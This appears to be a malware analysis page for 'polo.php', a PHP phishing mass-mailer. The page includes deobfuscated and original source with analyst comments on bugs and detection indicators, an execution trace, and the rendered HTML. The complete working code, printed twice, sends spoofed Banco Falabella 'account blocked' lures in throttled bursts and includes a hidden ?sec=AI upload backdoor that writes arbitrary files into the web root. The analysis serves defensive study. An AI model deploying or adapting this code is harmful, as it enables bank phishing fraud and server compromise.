PHP Malware Analysis

polo.php

md5: 821017288cfa63d9e5fdcededc3d19de


Deobfuscated PHP code

<?php

// Password gate is disabled: with an empty $auth_pass the !empty() check
// below never runs, so the mailer and the upload feature are reachable
// without any authentication. (The wso* names match the WSO web-shell login
// scaffold; only its login gate was reused here.)
$auth_pass = "";
// Renders a bare password form and terminates the request. Only reached when
// $auth_pass is non-empty and the cookie check fails.
function wsoLogin()
{
    die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
// Login gate (inactive here because $auth_pass is ""). When enabled it accepts a
// POSTed 'pass' whose md5 loosely equals $auth_pass, then keys the session cookie
// on md5(HTTP_HOST). Detection hint for the enabled variant: a cookie whose name
// is a 32-hex-char string equal to md5 of the Host header.
if (!empty($auth_pass)) {
    if (isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
    }
    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass) {
        wsoLogin();
    }
}
// Sets a cookie and mirrors it into $_COOKIE so the check in the same request
// passes without a round trip. No expiry, path or HttpOnly flags are set.
function WSOsetcookie($k, $v)
{
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}
// Lift the execution time limit so a long sending loop is not cut off by
// max_execution_time; '@' hides the warning when the function is disabled
// (the trace on this page shows it returning FALSE in the sandbox).
@set_time_limit(0);
// 'Enoc' is the submit button of the form below: when present, the operator's
// posted values drive the send; otherwise the built-in lure defaults are used.
if (isset($_POST['Enoc'])) {
    $message = $_POST['html'];       // HTML mail body
    $subject = $_POST['assunto'];    // subject line
    $de = $_POST['de'];              // spoofed From address
    $nombre = $_POST['RealName'];    // From display name
    $ellos = $_POST['ellos'];        // recipient list, one per line (or comma-separated, see ?c= below)
    // The urlencode / ereg_replace / urldecode round-trip turns %5C%22 (an
    // escaped quote, \") into a bare quote; stripslashes then removes any
    // remaining magic-quotes backslashes. ereg_replace was removed in PHP 7.0,
    // so on PHP 7+ this branch dies with an undefined-function error.
    $message = urlencode($message);
    $message = ereg_replace("%5C%22", "%22", $message);
    $message = urldecode($message);
    $message = stripslashes($message);
} else {
    $testa = "";  // assigned but never used
    // Default lure: a Spanish "your account has been blocked" notice impersonating
    // Banco Falabella. The display name is an RFC 2047 encoded-word whose bytes
    // F0 9F 94 92 are the UTF-8 encoding of U+1F512 (lock emoji) in front of the
    // bank name. The subject defaults to the compromised host's Host header.
    $message = "Te informamos que tu cuenta a sido bloqueada.";
    $subject = $_SERVER["HTTP_HOST"];
    $nombre = "=?UTF-8?Q?=F0=9F=94=92?=Banco Falabella";
    $de = "bf@bancofalabella.com.pe";
    $ellos = "motorolarkr@gmail.com";  // default recipient, presumably the operator's own check address
}
?>
<html>
<head>
<title>Mailer_2015</title></head>
</head>
<body style="font-family: Arial; font-size: 11px">
<center>
<form action="" method="post" enctype="multipart/form-data" name="form1">
<br><table width="534" height="248" border="0" cellpadding="0" cellspacing="1" bgcolor="#0000CC" class="normal"> 
<tr>
<td>
<table border="0" bgcolor="#FFFFFF" width="95%">
<tr>
<td>
<table border="0" width="100%">
<tr>
<td width="359">Email:   <input name="de" type="text" class="form" id="de" size="30" value="bf@bancofalabella.com.pe"></td>
<td>Nombre:   <input name="RealName" type="text" class="form" id="RealName" size="30" value="=?UTF-8?Q?=F0=9F=94=92?=Banco Falabella"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td>Asunto: <input name="assunto" type="text" class="form" id="assunto" size="78" value="Te informamos que tu cuenta a sido bloqueada."></td>
</tr>
<tr>
<td height="18" bgcolor="#C0C0C0"></td>
</tr>
<tr>
<td>
<table border="0" width="100%">
<tr>
<td>
<textarea name="html" cols="66" rows="10" id="html"></textarea></td>
<td><textarea rows="10" name="ellos" cols="35">
carlosrkr@live.com</textarea></td>
</tr>
</table>
</td>
</tr>
<tr>
<td><center>
<br><input type="submit" name="Enoc" value="Enviar"></center><br>
<?php 
// Hidden upload feature, enabled only by the query string ?sec=AI (no isset
// check, so a plain request emits an undefined-index notice).
if ($_GET['sec'] == 'AI') {
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">\r\n        <input name=\"archivo\" type=\"file\" size=\"35\" />\r\n        <input name=\"action\" type=\"hidden\" value=\"upload\" />     \r\n\t</form>";
    $status = "";
    // Inverted condition: the form just printed posts action=upload, yet this
    // branch runs only when 'action' is empty or absent (null == "" is true
    // under loose comparison), i.e. for a crafted multipart request.
    if ($_POST["action"] == "") {
        $tamano = $_FILES["archivo"]['size'];  // size and type are read but never checked
        $tipo = $_FILES["archivo"]['type'];
        $archivo = $_FILES["archivo"]['name'];  // client-supplied filename, used as-is
        if ($archivo != "") {
            // Writes the upload next to this script under the client-chosen name:
            // no extension/type validation and no basename(), so any file,
            // including executable PHP, lands in the web root. Detection: a POST
            // to this script with ?sec=AI and a multipart 'archivo' part; new
            // files appearing beside polo.php.
            if (copy($_FILES['archivo']['tmp_name'], "./" . $archivo)) {
                $status = "Archivo subido: <b>" . $archivo . "</b>";
            } else {
                $status = "Error al subir el archivo";
            }
        } else {
            $status = "Error al subir archivo";
        }
        echo $status;
    }
}
// Everything below runs only for a form submission ('Enoc' is the send
// button); a plain GET renders the form and stops here. The trace on this
// page ends at this point for the same reason.
if (!isset($_POST['Enoc'])) {
    exit;
}
// Recipient list: one address per line by default, comma-separated when ?c= is present.
if (!isset($_GET['c'])) {
    $email = explode("\n", $ellos);
} else {
    $email = explode(",", $ellos);
}
$son = count($email);  // total recipients, used only in the progress output
// Two header sets selected by ?e=. Default: HTML headers with the spoofed
// From/Reply-To and an X-Mailer naming this host. With ?e= present: minimal
// CRLF headers and a bare From. Neither variant filters CR/LF out of the
// POSTed name/address values.
if (!isset($_GET['e'])) {
    $header = "MIME-Version: 1.0\n";  // dead store, overwritten on the next line (deobfuscation artefact; the original used .=)
    $header = "MIME-Version: 1.0\nContent-type: text/html; charset=iso-8859-1\n";
    $header .= "From: " . $nombre . " <" . $de . ">\n";
    $header .= "Reply-To: " . $de . "\n";
    $header .= "X-Priority: 3\n";
    $header .= "X-MSMail-Priority: Normal\n";
    // Mail-side indicator: X-Mailer carries the compromised server's Host header.
    $header .= "X-Mailer: " . $_SERVER["HTTP_HOST"];
} else {
    $header = "MIME-Version: 1.0\r\n";  // dead store, overwritten on the next line
    $header = "MIME-Version: 1.0\r\nContent-type: text/html\r\n";
    $header .= "From: " . $de;
}
$i = 0;
$voy = 1;  // 1-based counter for the progress lines
// Sending loop. It stops at the first falsy entry (an empty line or trailing
// newline in the list) and reading one past the end raises an undefined-offset
// notice.
while ($email[$i]) {
    // Throttling: with ?time= and ?cant= set, every 'cant' messages the script
    // sends a copy to ?notf= (an operator check address) and sleeps 'time'
    // seconds, a burst-and-pause pattern against rate limits. Detection: outbound
    // bursts of a fixed size with regular gaps, each followed by one copy to a
    // constant address.
    if (isset($_GET['time']) && isset($_GET['cant'])) {
        if (fmod($i, $_GET['cant']) == 0 && $i > 0) {
            print "----------------------------------> wait " . $_GET['time'] . " Segs. Sending to " . $_GET['notf'] . "...<br>\n";
            flush();
            @mail($_GET['notf'], $subject, $message, $header);
            sleep($_GET['time']);
        }
    }
    // Strip line endings; since "\n" is replaced first, the "\r\n" entry can
    // never match and a lone "\r" survives.
    $mail = str_replace(array("\n", "\r\n"), '', $email[$i]);
    // Per-recipient personalisation of a %email% placeholder (ereg_replace,
    // removed in PHP 7.0).
    $message1 = ereg_replace("%email%", $mail, $message);
    // mail() returning true only means the local MTA accepted the message;
    // '@' hides any send error.
    if (@mail($mail, $subject, $message1, $header)) {
        print "<font color=blue face=verdana size=1>    " . $voy . " de " . $son . "  ;-) " . trim($mail) . "  okey dokey!</font><br>\n";
        flush();
    } else {
        print "<font color=red face=verdana size=1>    " . $voy . " de " . $son . ":-( " . trim($mail) . "  Error te digo altoquesein!!</font><br>\n";
        flush();
    }
    $i++;
    $voy++;
}
// Completion banner; together with "Mailer_2015", "okey dokey" and
// "altoquesein" a usable string indicator for this mailer.
echo "<script> alert('---Todos Spameados---'); </script>";
?>
</td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</form>
</center>
</html>

Execution traces

data/traces/821017288cfa63d9e5fdcededc3d19de_trace-1676254964.5419.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:23:10.439775]
1	0	1	0.000270	393512
1	3	0	0.000578	422320	{main}	1		/var/www/html/uploads/polo.php	0	0
1		A						/var/www/html/uploads/polo.php	3	$auth_pass = ''
2	4	0	0.000627	422320	set_time_limit	0		/var/www/html/uploads/polo.php	18	1	0
2	4	1	0.000652	422384
2	4	R			FALSE
1		A						/var/www/html/uploads/polo.php	33	$testa = ''
1		A						/var/www/html/uploads/polo.php	34	$message = 'Te informamos que tu cuenta a sido bloqueada.'
1		A						/var/www/html/uploads/polo.php	35	$subject = 'localhost'
1		A						/var/www/html/uploads/polo.php	36	$nombre = '=?UTF-8?Q?=F0=9F=94=92?=Banco Falabella'
1		A						/var/www/html/uploads/polo.php	37	$de = 'bf@bancofalabella.com.pe'
1		A						/var/www/html/uploads/polo.php	38	$ellos = 'motorolarkr@gmail.com'
			0.000832	343176
TRACE END   [2023-02-13 00:23:10.440384]


Generated HTML code

<html><head>
<title>Mailer_2015</title></head>

<body style="font-family: Arial; font-size: 11px">
<center>
<form action="" method="post" enctype="multipart/form-data" name="form1">
<br><table width="534" height="248" border="0" cellpadding="0" cellspacing="1" bgcolor="#0000CC" class="normal"> 
<tbody><tr>
<td>
<table border="0" bgcolor="#FFFFFF" width="95%">
<tbody><tr>
<td>
<table border="0" width="100%">
<tbody><tr>
<td width="359">Email:   <input name="de" type="text" class="form" id="de" size="30" value="bf@bancofalabella.com.pe"></td>
<td>Nombre:   <input name="RealName" type="text" class="form" id="RealName" size="30" value="=?UTF-8?Q?=F0=9F=94=92?=Banco Falabella"></td>
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td>Asunto: <input name="assunto" type="text" class="form" id="assunto" size="78" value="Te informamos que tu cuenta a sido bloqueada."></td>
</tr>
<tr>
<td height="18" bgcolor="#C0C0C0"></td>
</tr>
<tr>
<td>
<table border="0" width="100%">
<tbody><tr>
<td>
<textarea name="html" cols="66" rows="10" id="html"></textarea></td>
<td><textarea rows="10" name="ellos" cols="35">carlosrkr@live.com</textarea></td>
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td><center>
<br><input type="submit" name="Enoc" value="Enviar"></center><br>
</td></tr></tbody></table></td></tr></tbody></table></form></center></body></html>

Original PHP code

<?php

// Empty password: the WSO-style login gate below is never activated.
$auth_pass = "";
// Prints a password form and ends the request (only used when $auth_pass is set).
function wsoLogin() {
	die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
// Login gate (inactive: $auth_pass is ""). When active, a cookie named
// md5(HTTP_HOST) holding $auth_pass is the session token.
if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}
// Sets the cookie and mirrors it into $_COOKIE for the current request.
function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}
// No time limit for the sending loop (warning suppressed if disabled).
@set_time_limit(0);
// 'Enoc' is the send button: operator-supplied values on submit, lure defaults otherwise.
if(isset($_POST['Enoc']))
{
	$message = $_POST['html'];
	$subject = $_POST['assunto'];
	$de = $_POST['de'];
	$nombre = $_POST['RealName'];
	$ellos = $_POST['ellos'];

	// Turns escaped quotes (%5C%22 = \") into plain quotes, then strips
	// magic-quotes backslashes. ereg_replace no longer exists on PHP 7+.
	$message = urlencode($message);
	$message = ereg_replace("%5C%22", "%22", $message);
	$message = urldecode($message);
	$message = stripslashes($message);

}else{
	$testa ="";  // unused
	// Banco Falabella "account blocked" lure; the display name is an RFC 2047
	// encoded-word (bytes F0 9F 94 92 = UTF-8 for U+1F512, lock emoji).
	$message = "Te informamos que tu cuenta a sido bloqueada.";
	$subject = $_SERVER["HTTP_HOST"];
	$nombre = "=?UTF-8?Q?=F0=9F=94=92?=Banco Falabella";
	$de = "bf@bancofalabella.com.pe";
	$ellos = "motorolarkr@gmail.com";
}
?>
<html>
<head>
<title>Mailer_2015</title></head>
</head>
<body style="font-family: Arial; font-size: 11px">
<center>
<form action="" method="post" enctype="multipart/form-data" name="form1">
<br><table width="534" height="248" border="0" cellpadding="0" cellspacing="1" bgcolor="#0000CC" class="normal"> 
<tr>
<td>
<table border="0" bgcolor="#FFFFFF" width="95%">
<tr>
<td>
<table border="0" width="100%">
<tr>
<td width="359">Email:   <input name="de" type="text" class="form" id="de" size="30" value="bf@bancofalabella.com.pe"></td>
<td>Nombre:   <input name="RealName" type="text" class="form" id="RealName" size="30" value="=?UTF-8?Q?=F0=9F=94=92?=Banco Falabella"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td>Asunto: <input name="assunto" type="text" class="form" id="assunto" size="78" value="Te informamos que tu cuenta a sido bloqueada."></td>
</tr>
<tr>
<td height="18" bgcolor="#C0C0C0"></td>
</tr>
<tr>
<td>
<table border="0" width="100%">
<tr>
<td>
<textarea name="html" cols="66" rows="10" id="html"></textarea></td>
<td><textarea rows="10" name="ellos" cols="35">
carlosrkr@live.com</textarea></td>
</tr>
</table>
</td>
</tr>
<tr>
<td><center>
<br><input type="submit" name="Enoc" value="Enviar"></center><br>
<?php
// Hidden upload feature behind ?sec=AI. The upload branch runs when 'action'
// is empty/absent (null == "" loosely), not when the printed form's
// action=upload is posted. The file is written beside this script under the
// client-chosen name with no validation of name, type or size.
if($_GET['sec']=='AI')
{
	echo '<form action="" method="post" enctype="multipart/form-data">
        <input name="archivo" type="file" size="35" />
        <input name="action" type="hidden" value="upload" />     
	</form>';

	$status = "";
	if ($_POST["action"] == "")
	{
		$tamano = $_FILES["archivo"]['size'];  // read, never checked
		$tipo = $_FILES["archivo"]['type'];    // read, never checked
		$archivo = $_FILES["archivo"]['name'];
         
		if ($archivo != "")
		{
			// Arbitrary file write into the web root (no basename(), no extension filter).
			if (copy($_FILES['archivo']['tmp_name'],"./".$archivo))
			{
				$status = "Archivo subido: <b>".$archivo."</b>";
			}else{
				$status = "Error al subir el archivo";
			}
		} else {
			$status = "Error al subir archivo";
		}
		echo $status;
	}
}
// Only a form submission continues past this point.
if(!isset($_POST['Enoc'])){
	exit;
}

// Recipients: newline-separated by default, comma-separated with ?c=.
if(!isset($_GET['c']))
{
	$email = explode("\n", $ellos);
}else{
	$email = explode(",", $ellos);
}
$son = count($email);  // total, for the progress output only

// Header set selected by ?e=: full HTML headers with spoofed From/Reply-To and
// an X-Mailer naming this host (a mail-side indicator), or minimal CRLF
// headers with a bare From. POSTed values go into headers unfiltered.
if(!isset($_GET['e'])){
	$header = "MIME-Version: 1.0\n";
	$header .= "Content-type: text/html; charset=iso-8859-1\n";
	$header .= "From: ".$nombre . " <" . $de . ">\n";
	$header .= "Reply-To: " . $de . "\n";
	$header .= "X-Priority: 3\n";
	$header .= "X-MSMail-Priority: Normal\n";
	$header .= "X-Mailer: ".$_SERVER["HTTP_HOST"];
}else{
	$header ='MIME-Version: 1.0' . "\r\n";
	$header .= 'Content-type: text/html' . "\r\n";
	$header .="From: ".$de;
}
$i = 0;
$voy=1;  // 1-based progress counter
// Sending loop; stops at the first empty list entry.
while($email[$i])
{
	// Throttling: every 'cant' messages, mail a copy to ?notf= and sleep 'time'
	// seconds (burst-and-pause; detectable as fixed-size outbound bursts with
	// regular gaps and a recurring copy to one address).
	if(isset($_GET['time']) && isset($_GET['cant'])){
		if(fmod($i,$_GET['cant'])==0 && $i>0){
			print "----------------------------------> wait ".$_GET['time']." Segs. Sending to ".$_GET['notf']."...<br>\n";
			flush();
			@mail($_GET['notf'], $subject, $message, $header);
			sleep($_GET['time']);
		}
	}
	// "\n" is removed first, so the "\r\n" entry never matches; a lone "\r" survives.
	$mail = str_replace(array("\n","\r\n"),'',$email[$i]);
        $message1 = ereg_replace("%email%", $mail, $message);  // per-recipient %email% placeholder; ereg_replace removed in PHP 7.0
	// true only means the local MTA accepted the message; '@' hides errors.
	if(@mail($mail, $subject, $message1, $header))
	{
		print "<font color=blue face=verdana size=1>    ".$voy." de ".$son."  ;-) ".trim($mail)."  okey dokey!</font><br>\n";
		flush();
	}
	else
	{
		print "<font color=red face=verdana size=1>    ".$voy." de ".$son.":-( ".trim($mail)."  Error te digo altoquesein!!</font><br>\n";
		flush();
	}                                                             
	$i++;
	$voy++;
}
// Completion banner; a string indicator for this mailer alongside "Mailer_2015".
echo "<script> alert('---Todos Spameados---'); </script>";
?>
</td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</form>
</center>
</html>